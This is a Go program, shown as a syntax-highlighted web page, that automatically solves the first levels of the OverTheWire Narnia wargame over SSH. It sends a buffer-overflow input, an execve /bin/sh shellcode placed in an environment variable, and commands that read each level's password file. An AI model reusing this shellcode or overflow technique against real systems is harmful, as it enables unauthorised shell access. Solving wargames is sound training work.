<!DOCTYPE html>
<html lang="en">
	<head>
		<title>overthewire - narnia/main.go</title>
		<link type="text/css" rel="stylesheet" href="/style/src.css">
	</head>
	<body>
		<h1><a href="/overthewire">overthewire</a> - narnia/main.go</h1>
		<pre>
<span class="hidden"><a id="L1" href="#L1">     1</a>  </span><span>package main <span class="text">// import &#34;vimagination.zapto.org/overthewire/narnia&#34;</span></span>
<span class="hidden"><a id="L2" href="#L2">     2</a>  </span><span></span>
<span class="hidden"><a id="L3" href="#L3">     3</a>  </span><span>import (</span>
<span class="hidden"><a id="L4" href="#L4">     4</a>  </span><span>	&#34;bytes&#34;</span>
<span class="hidden"><a id="L5" href="#L5">     5</a>  </span><span>	&#34;flag&#34;</span>
<span class="hidden"><a id="L6" href="#L6">     6</a>  </span><span>	&#34;fmt&#34;</span>
<span class="hidden"><a id="L7" href="#L7">     7</a>  </span><span>	&#34;log&#34;</span>
<span class="hidden"><a id="L8" href="#L8">     8</a>  </span><span>	&#34;os&#34;</span>
<span class="hidden"><a id="L9" href="#L9">     9</a>  </span><span>	&#34;time&#34;</span>
<span class="hidden"><a id="L10" href="#L10">    10</a>  </span><span></span>
<span class="hidden"><a id="L11" href="#L11">    11</a>  </span><span>	&#34;golang.org/x/crypto/ssh&#34;</span>
<span class="hidden"><a id="L12" href="#L12">    12</a>  </span><span></span>
<span class="hidden"><a id="L13" href="#L13">    13</a>  </span><span>	&#34;vimagination.zapto.org/memio&#34;</span>
<span class="hidden"><a id="L14" href="#L14">    14</a>  </span><span>)</span>
<span class="hidden"><a id="L15" href="#L15">    15</a>  </span><span></span>
<span class="hidden"><a id="L16" href="#L16">    16</a>  </span><span>const (</span>
<span class="hidden"><a id="L17" href="#L17">    17</a>  </span><span>	host     = &#34;narnia.labs.overthewire.org:2226&#34;</span>
<span class="hidden"><a id="L18" href="#L18">    18</a>  </span><span>	username = &#34;narnia%d&#34;</span>
<span class="hidden"><a id="L19" href="#L19">    19</a>  </span><span>)</span>
<span class="hidden"><a id="L20" href="#L20">    20</a>  </span><span></span>
<span class="hidden"><a id="L21" href="#L21">    21</a>  </span><span>var (</span>
<span class="hidden"><a id="L22" href="#L22">    22</a>  </span><span>	commands = [...][]string{</span>
<span class="hidden"><a id="L23" href="#L23">    23</a>  </span><span>		<span class="text">//level 0</span></span>
<span class="hidden"><a id="L24" href="#L24">    24</a>  </span><span>		[]string{</span>
<span class="hidden"><a id="L25" href="#L25">    25</a>  </span><span>			&#34;/narnia/narnia0;exit\n&#34;,</span>
<span class="hidden"><a id="L26" href="#L26">    26</a>  </span><span>			&#34;00000000000000000000&#34; + string([]byte{0xef, 0xbe, 0xad, 0xde}) + &#34;\n&#34;,</span>
<span class="hidden"><a id="L27" href="#L27">    27</a>  </span><span>			&#34;echo -n \&#34;Password:\&#34;;cat /etc/narnia_pass/narnia1;exit\n&#34;,</span>
<span class="hidden"><a id="L28" href="#L28">    28</a>  </span><span>		},</span>
<span class="hidden"><a id="L29" href="#L29">    29</a>  </span><span>		<span class="text">//level 1</span></span>
<span class="hidden"><a id="L30" href="#L30">    30</a>  </span><span>		[]string{</span>
<span class="hidden"><a id="L31" href="#L31">    31</a>  </span><span>			&#34;EGG=\&#34;$(printf \&#34;\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\&#34;)\&#34; /narnia/narnia1;exit\n&#34;, <span class="text">// Shell Code from http://shell-storm.org/shellcode/files/shellcode-811.php</span></span>
<span class="hidden"><a id="L32" href="#L32">    32</a>  </span><span>			&#34;echo -n \&#34;Password:\&#34;;cat /etc/narnia_pass/narnia2;exit\n&#34;,</span>
<span class="hidden"><a id="L33" href="#L33">    33</a>  </span><span>		},</span>
<span class="hidden"><a id="L34" href="#L34">    34</a>  </span><span>	}</span>
<span class="hidden"><a id="L35" href="#L35">    35</a>  </span><span>	passwordBytes = []byte(&#34;Password:&#34;)</span>
<span class="hidden"><a id="L36" href="#L36">    36</a>  </span><span>	sValueBytes   = []byte(&#34;SVALUE:&#34;)</span>
<span class="hidden"><a id="L37" href="#L37">    37</a>  </span><span>	newLine       = []byte{&#39;\n&#39;}</span>
<span class="hidden"><a id="L38" href="#L38">    38</a>  </span><span>)</span>
<span class="hidden"><a id="L39" href="#L39">    39</a>  </span><span></span>
<span class="hidden"><a id="L40" href="#L40">    40</a>  </span><span>func main() {</span>
<span class="hidden"><a id="L41" href="#L41">    41</a>  </span><span>	var (</span>
<span class="hidden"><a id="L42" href="#L42">    42</a>  </span><span>		level    uint</span>
<span class="hidden"><a id="L43" href="#L43">    43</a>  </span><span>		password string</span>
<span class="hidden"><a id="L44" href="#L44">    44</a>  </span><span>	)</span>
<span class="hidden"><a id="L45" href="#L45">    45</a>  </span><span></span>
<span class="hidden"><a id="L46" href="#L46">    46</a>  </span><span>	flag.UintVar(&amp;level, &#34;l&#34;, 0, &#34;level number. &gt; 0 requires password&#34;)</span>
<span class="hidden"><a id="L47" href="#L47">    47</a>  </span><span>	flag.StringVar(&amp;password, &#34;p&#34;, &#34;narnia0&#34;, &#34;password for initial level&#34;)</span>
<span class="hidden"><a id="L48" href="#L48">    48</a>  </span><span>	flag.Parse()</span>
<span class="hidden"><a id="L49" href="#L49">    49</a>  </span><span></span>
<span class="hidden"><a id="L50" href="#L50">    50</a>  </span><span>	stdout := make(memio.Buffer, 0, 41)</span>
<span class="hidden"><a id="L51" href="#L51">    51</a>  </span><span></span>
<span class="hidden"><a id="L52" href="#L52">    52</a>  </span><span>	<span class="text">// levels 0-24</span></span>
<span class="hidden"><a id="L53" href="#L53">    53</a>  </span><span></span>
<span class="hidden"><a id="L54" href="#L54">    54</a>  </span><span>	for n, cmds := range commands[level:] {</span>
<span class="hidden"><a id="L55" href="#L55">    55</a>  </span><span>		n += int(level)</span>
<span class="hidden"><a id="L56" href="#L56">    56</a>  </span><span>		log.Printf(&#34;Level %2d: Sending Commands...\n&#34;, n)</span>
<span class="hidden"><a id="L57" href="#L57">    57</a>  </span><span></span>
<span class="hidden"><a id="L58" href="#L58">    58</a>  </span><span>		s, err := ssh.Dial(&#34;tcp&#34;, host, &amp;ssh.ClientConfig{</span>
<span class="hidden"><a id="L59" href="#L59">    59</a>  </span><span>			User:            fmt.Sprintf(username, n),</span>
<span class="hidden"><a id="L60" href="#L60">    60</a>  </span><span>			Auth:            []ssh.AuthMethod{ssh.Password(password)},</span>
<span class="hidden"><a id="L61" href="#L61">    61</a>  </span><span>			HostKeyCallback: ssh.InsecureIgnoreHostKey(),</span>
<span class="hidden"><a id="L62" href="#L62">    62</a>  </span><span>		})</span>
<span class="hidden"><a id="L63" href="#L63">    63</a>  </span><span>		if err != nil {</span>
<span class="hidden"><a id="L64" href="#L64">    64</a>  </span><span>			log.Printf(&#34;Level %2d: error: %s\n&#34;, n, err)</span>
<span class="hidden"><a id="L65" href="#L65">    65</a>  </span><span>			return</span>
<span class="hidden"><a id="L66" href="#L66">    66</a>  </span><span>		}</span>
<span class="hidden"><a id="L67" href="#L67">    67</a>  </span><span></span>
<span class="hidden"><a id="L68" href="#L68">    68</a>  </span><span>		session, err := s.NewSession()</span>
<span class="hidden"><a id="L69" href="#L69">    69</a>  </span><span>		if err != nil {</span>
<span class="hidden"><a id="L70" href="#L70">    70</a>  </span><span>			log.Printf(&#34;Level %2d: error: %s\n&#34;, n, err)</span>
<span class="hidden"><a id="L71" href="#L71">    71</a>  </span><span>			return</span>
<span class="hidden"><a id="L72" href="#L72">    72</a>  </span><span>		} else if err = session.RequestPty(&#34;vt100&#34;, 40, 80, ssh.TerminalModes{</span>
<span class="hidden"><a id="L73" href="#L73">    73</a>  </span><span>			ssh.ECHO:          0,</span>
<span class="hidden"><a id="L74" href="#L74">    74</a>  </span><span>			ssh.TTY_OP_ISPEED: 14400,</span>
<span class="hidden"><a id="L75" href="#L75">    75</a>  </span><span>			ssh.TTY_OP_OSPEED: 14400,</span>
<span class="hidden"><a id="L76" href="#L76">    76</a>  </span><span>		}); err != nil {</span>
<span class="hidden"><a id="L77" href="#L77">    77</a>  </span><span>			log.Printf(&#34;Level %2d: error: %s\n&#34;, n, err)</span>
<span class="hidden"><a id="L78" href="#L78">    78</a>  </span><span>			return</span>
<span class="hidden"><a id="L79" href="#L79">    79</a>  </span><span>		}</span>
<span class="hidden"><a id="L80" href="#L80">    80</a>  </span><span></span>
<span class="hidden"><a id="L81" href="#L81">    81</a>  </span><span>		session.Stdout = &amp;stdout</span>
<span class="hidden"><a id="L82" href="#L82">    82</a>  </span><span>		session.Stderr = os.Stderr</span>
<span class="hidden"><a id="L83" href="#L83">    83</a>  </span><span>		wc, _ := session.StdinPipe()</span>
<span class="hidden"><a id="L84" href="#L84">    84</a>  </span><span>		if err = session.Shell(); err != nil {</span>
<span class="hidden"><a id="L85" href="#L85">    85</a>  </span><span>			log.Printf(&#34;Level %2d: error: %s\n&#34;, n, err)</span>
<span class="hidden"><a id="L86" href="#L86">    86</a>  </span><span>			return</span>
<span class="hidden"><a id="L87" href="#L87">    87</a>  </span><span>		}</span>
<span class="hidden"><a id="L88" href="#L88">    88</a>  </span><span></span>
<span class="hidden"><a id="L89" href="#L89">    89</a>  </span><span>		for _, cmd := range cmds {</span>
<span class="hidden"><a id="L90" href="#L90">    90</a>  </span><span>			time.Sleep(time.Second * 2)</span>
<span class="hidden"><a id="L91" href="#L91">    91</a>  </span><span>			if cmd == &#34;%s\n&#34; {</span>
<span class="hidden"><a id="L92" href="#L92">    92</a>  </span><span>				p := bytes.Index(stdout, sValueBytes)</span>
<span class="hidden"><a id="L93" href="#L93">    93</a>  </span><span>				if p &lt; 0 {</span>
<span class="hidden"><a id="L94" href="#L94">    94</a>  </span><span>					log.Printf(&#34;Level %2d: error: could not find svalue\n&#34;, n)</span>
<span class="hidden"><a id="L95" href="#L95">    95</a>  </span><span>					return</span>
<span class="hidden"><a id="L96" href="#L96">    96</a>  </span><span>				}</span>
<span class="hidden"><a id="L97" href="#L97">    97</a>  </span><span>				l := bytes.Index(stdout[p:], newLine)</span>
<span class="hidden"><a id="L98" href="#L98">    98</a>  </span><span>				if l &lt; 0 {</span>
<span class="hidden"><a id="L99" href="#L99">    99</a>  </span><span>					log.Printf(&#34;Level %2d: error: could not find end of svalue\n&#34;, n)</span>
<span class="hidden"><a id="L100" href="#L100">   100</a>  </span><span>					return</span>
<span class="hidden"><a id="L101" href="#L101">   101</a>  </span><span>				}</span>
<span class="hidden"><a id="L102" href="#L102">   102</a>  </span><span>				cmd = fmt.Sprintf(cmd, bytes.TrimSpace(stdout[p+len(sValueBytes):p+l]))</span>
<span class="hidden"><a id="L103" href="#L103">   103</a>  </span><span>			}</span>
<span class="hidden"><a id="L104" href="#L104">   104</a>  </span><span>			_, err = wc.Write([]byte(cmd))</span>
<span class="hidden"><a id="L105" href="#L105">   105</a>  </span><span>			if err != nil {</span>
<span class="hidden"><a id="L106" href="#L106">   106</a>  </span><span>				os.Stdout.Write(stdout)</span>
<span class="hidden"><a id="L107" href="#L107">   107</a>  </span><span>				log.Printf(&#34;Level %2d: error: %s\n&#34;, n, err)</span>
<span class="hidden"><a id="L108" href="#L108">   108</a>  </span><span>				return</span>
<span class="hidden"><a id="L109" href="#L109">   109</a>  </span><span>			}</span>
<span class="hidden"><a id="L110" href="#L110">   110</a>  </span><span>			time.Sleep(time.Second)</span>
<span class="hidden"><a id="L111" href="#L111">   111</a>  </span><span>		}</span>
<span class="hidden"><a id="L112" href="#L112">   112</a>  </span><span></span>
<span class="hidden"><a id="L113" href="#L113">   113</a>  </span><span>		wc.Close()</span>
<span class="hidden"><a id="L114" href="#L114">   114</a>  </span><span>		session.Close()</span>
<span class="hidden"><a id="L115" href="#L115">   115</a>  </span><span>		s.Close()</span>
<span class="hidden"><a id="L116" href="#L116">   116</a>  </span><span></span>
<span class="hidden"><a id="L117" href="#L117">   117</a>  </span><span>		p := bytes.Index(stdout, passwordBytes)</span>
<span class="hidden"><a id="L118" href="#L118">   118</a>  </span><span>		if p &lt; 0 {</span>
<span class="hidden"><a id="L119" href="#L119">   119</a>  </span><span>			os.Stdout.Write(stdout)</span>
<span class="hidden"><a id="L120" href="#L120">   120</a>  </span><span>			log.Printf(&#34;Level %2d: error: could not find password\n&#34;, n)</span>
<span class="hidden"><a id="L121" href="#L121">   121</a>  </span><span>			return</span>
<span class="hidden"><a id="L122" href="#L122">   122</a>  </span><span>		}</span>
<span class="hidden"><a id="L123" href="#L123">   123</a>  </span><span>		l := bytes.Index(stdout[p:], newLine)</span>
<span class="hidden"><a id="L124" href="#L124">   124</a>  </span><span>		if l &lt; 0 {</span>
<span class="hidden"><a id="L125" href="#L125">   125</a>  </span><span>			log.Printf(&#34;Level %2d: error: could not find end of password\n&#34;, n)</span>
<span class="hidden"><a id="L126" href="#L126">   126</a>  </span><span>			return</span>
<span class="hidden"><a id="L127" href="#L127">   127</a>  </span><span>		}</span>
<span class="hidden"><a id="L128" href="#L128">   128</a>  </span><span></span>
<span class="hidden"><a id="L129" href="#L129">   129</a>  </span><span>		password = string(bytes.TrimSpace(stdout[p+len(passwordBytes) : p+l]))</span>
<span class="hidden"><a id="L130" href="#L130">   130</a>  </span><span></span>
<span class="hidden"><a id="L131" href="#L131">   131</a>  </span><span>		if password == &#34;&#34; {</span>
<span class="hidden"><a id="L132" href="#L132">   132</a>  </span><span>			log.Printf(&#34;Level %2d: error: found empty password\n&#34;, n)</span>
<span class="hidden"><a id="L133" href="#L133">   133</a>  </span><span>			return</span>
<span class="hidden"><a id="L134" href="#L134">   134</a>  </span><span>		}</span>
<span class="hidden"><a id="L135" href="#L135">   135</a>  </span><span></span>
<span class="hidden"><a id="L136" href="#L136">   136</a>  </span><span>		log.Printf(&#34;Level %2d: Password: %s\n&#34;, n, password)</span>
<span class="hidden"><a id="L137" href="#L137">   137</a>  </span><span>		stdout = stdout[:0]</span>
<span class="hidden"><a id="L138" href="#L138">   138</a>  </span><span>	}</span>
<span class="hidden"><a id="L139" href="#L139">   139</a>  </span><span>}</span>
		</pre>
	</body>
</html>
